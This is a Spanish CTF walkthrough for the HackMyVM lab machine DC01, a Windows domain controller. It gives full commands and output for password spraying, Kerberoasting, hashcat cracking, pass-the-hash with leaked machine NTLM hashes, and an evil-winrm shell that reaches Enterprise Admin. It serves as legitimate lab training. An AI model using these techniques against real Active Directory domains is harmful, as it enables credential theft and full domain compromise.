💻 Máquina DC01 - HackMyVm
© 2025 hackmyvm
Reconocimiento
Lo primero que haremos será identificar la dirección IP de la máquina objetivo. Para ello utilizamos arp-scan, una herramienta muy útil para descubrir hosts activos en la red.
1
2
3
4
5
6
7
8
9
10
sudo arp-scan -I eth1 10.10.10.0/24
Interface: eth1, type: EN10MB, MAC: 08:00:27:41:0a:fa, IPv4: 10.10.10.101
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
10.10.10.1 0a:00:27:00:00:0a (Unknown: locally administered)
10.10.10.100 08:00:27:3e:6b:2c (Unknown)
10.10.10.104 08:00:27:39:de:29 (Unknown)
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.924 seconds (133.06 hosts/sec). 3 responded
Una vez identificada la dirección IP de la máquina (10.10.10.104), continuamos con un escaneo inicial utilizando Nmap para obtener información sobre los servicios expuestos y posibles vectores de ataque.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
sudo nmap -sSCV -p- -n --min-rate 5000 10.10.10.104 -vvv -oN scan
Nmap scan report for 10.10.10.104
Host is up, received arp-response (0.0034s latency).
Scanned at 2026-02-12 05:58:27 EST for 124s
Not shown: 65518 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 128 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 128 Microsoft Windows Kerberos (server time: 2026-02-12 18:59:03Z)
135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL, Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 128
464/tcp open kpasswd5? syn-ack ttl 128
593/tcp open ncacn_http syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 128
3268/tcp open ldap syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 128
5985/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 128 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49674/tcp open ncacn_http syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0
49687/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
MAC Address: 08:00:27:39:DE:29 (Oracle VirtualBox virtual NIC)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
A partir de esta información podemos identificar el nombre del dominio, aunque para confirmarlo utilizaremos nxc.
1
2
nxc smb 10.10.10.104
SMB 10.10.10.104 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
Ahora sí, confirmamos que el dominio es SOUPEDECODE.LOCAL y que el hostname corresponde a DC01. Con esta información, añadimos ambos al archivo /etc/hosts.
Explotación
Probamos a enumerar usuarios utilizando nxc contra el servicio SMB y comprobamos que, si no especificamos usuario ni contraseña, no se devuelve ninguna información. Sin embargo, al establecer guest como usuario, sí obtenemos resultados.
1
nxc smb 10.10.10.104 -u 'guest' -p '' --rid-brute | grep 'SidTypeUser' | awk '{print $6}' | cut -d '\' -f 2 > domain_users.txt
Dado que no contamos con credenciales para ningún usuario, intentamos realizar un AS-REP Roasting Attack, aunque en este caso no obtenemos ningún resultado.
Como alternativa, probamos un ataque de password spraying para comprobar si existe algún usuario cuya contraseña coincida con su propio nombre.
1
2
nxc smb 10.10.10.104 -u domain_users.txt -p domain_users.txt --no-bruteforce --continue-on-success | grep '[+]'
SMB 10.10.10.104 445 DC01 [+] SOUPEDECODE.LOCAL\ybob317:ybob317
Y ahora sí, obtenemos unas credenciales válidas: ybob317 : ybob317.
Procedemos a revisar sus carpetas compartidas para comprobar si podemos acceder a información adicional.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
smbmap -H 10.10.10.104 -u ybob317 -p ybob317
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.10.104:445 Name: 10.10.10.104 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
backup NO ACCESS
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Users READ ONLY
[*] Closed 1 connections
Accedemos a la carpeta Users y procedemos a leer su contenido.
Aquí es donde obtenemos la primera flag.
1
2
3
4
5
6
7
8
9
10
smbclient //10.10.10.104/Users -U 'ybob317%ybob317'
Try "help" to get a list of possible commands.
smb: \> cd ybob317\Desktop\
smb: \ybob317\Desktop\> dir
. DR 0 Mon Jun 17 13:45:32 2024
.. D 0 Mon Jun 17 13:24:32 2024
desktop.ini AHS 282 Mon Jun 17 13:24:32 2024
user.txt A 32 Wed Jun 12 07:54:32 2024
12942591 blocks of size 4096. 10961216 blocks available
El resto de carpetas resultan ser rabbit holes, así que optamos por buscar otras vías de acceso.
Dado que contamos con una lista extensa de usuarios, intentamos realizar AS‑REP Roasting, aunque en este caso no obtenemos ningún hash.
No obstante, al disponer de un usuario con contraseña válida, procedemos a probar Kerberoasting para comprobar si podemos obtener algún resultado útil.
1
2
3
4
5
6
7
8
9
10
impacket-GetUserSPNs -request -dc-ip 10.10.10.104 -outputfile kerberoast_hashes.txt "SOUPEDECODE.LOCAL/ybob317:ybob317"
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- -------------- -------- -------------------------- --------- ----------
FTP/FileServer file_svc 2024-06-17 13:32:23.726085 <never>
FW/ProxyServer firewall_svc 2024-06-17 13:28:32.710125 <never>
HTTP/BackupServer backup_svc 2024-06-17 13:28:49.476511 <never>
HTTP/WebServer web_svc 2024-06-17 13:29:04.569417 <never>
HTTPS/MonitoringServer monitoring_svc 2024-06-17 13:29:18.511871 <never>
Y hemos tenido suerte y hemos obtenido los hashes de estas cuentas de servicio, así que procedemos a comprobar si es posible crackearlos.
1
hashcat -m 13100 -a 0 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
Y tras esperar un momento, obtenemos las credenciales de file_svc : Password123!!.
Procedemos a comprobar si es posible obtener una shell a través de SMB.
1
2
3
nxc smb 10.10.10.104 -u 'file_svc' -p 'Password123!!'
SMB 10.10.10.104 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
SMB 10.10.10.104 445 DC01 [+] SOUPEDECODE.LOCAL\file_svc:Password123!!
Como podemos ver, las credenciales son válidas, pero no es posible obtener una shell. Por ello, procedemos a enumerar las carpetas compartidas asociadas a esta cuenta.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
smbmap -H 10.10.10.104 -u 'file_svc' -p 'Password123!!'
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.10.104:445 Name: 10.10.10.104 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
backup READ ONLY
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Users NO ACCESS
[*] Closed 1 connections
Y, para nuestra sorpresa, podemos leer una carpeta denominada backup.
1
2
3
4
5
6
7
8
smbclient //10.10.10.104/backup -U 'file_svc%Password123!!'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Jun 17 13:41:17 2024
.. DR 0 Mon Jun 17 13:44:56 2024
backup_extract.txt A 892 Mon Jun 17 04:41:05 2024
12942591 blocks of size 4096. 10961091 blocks available
Vemos un fichero llamado backup_extract.txt, así que procedemos a descargarlo.
1
2
3
4
5
6
7
8
9
10
11
12
cat backup_extract.txt
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
Y, como podemos observar, disponemos de los hashes correspondientes a varias máquinas del dominio. Procedemos a comprobar cuáles de ellos son válidos.
1
2
3
nxc smb 10.10.10.104 -u machines -H hashes | grep '[+]'
SMB 10.10.10.104 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
SMB 10.10.10.104 445 DC01 [+] SOUPEDECODE.LOCAL\FileServrer$:e41da7e79a4c76dbd9cf79d1cb325559 (Pwn3d!)
Post Explotación
Y comprobamos que, de todos los hashes disponibles, únicamente es válido el correspondiente a FileServer. Además, aparece marcado como pwned, así que procedemos a verificar si podemos obtener una shell mediante evil-winrm.
1
2
3
4
5
6
7
8
9
10
evil-winrm -i 10.10.10.104 -u 'FileServer$' -H e41da7e79a4c76dbd9cf79d1cb325559
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FileServer$\Documents>
Y vemos que sí podemos.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
*Evil-WinRM* PS C:\Users\FileServer$\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
======================= ============================================
soupedecode\fileserver$ S-1-5-21-2986980474-46765180-2505414164-2065
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
================================================== ================ =========================================== ===============================================================
SOUPEDECODE\Domain Computers Group S-1-5-21-2986980474-46765180-2505414164-515 Mandatory group, Enabled by default, Enabled group
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
SOUPEDECODE\Enterprise Admins Group S-1-5-21-2986980474-46765180-2505414164-519 Mandatory group, Enabled by default, Enabled group
SOUPEDECODE\Denied RODC Password Replication Group Alias S-1-5-21-2986980474-46765180-2505414164-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Como podemos ver, contamos con una gran cantidad de privilegios y pertenecemos a numerosos grupos. Destaca especialmente la pertenencia a SOUPEDECODE\Enterprise Admins.
Gracias a este nivel de privilegio, podemos acceder directamente al directorio del Administrador y leer su flag.
1
2
3
4
5
6
7
8
9
10
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/17/2024 10:41 AM backup
-a---- 6/17/2024 10:44 AM 32 root.txt
No obstante, también habríamos podido realizar un DCSync contra el DC.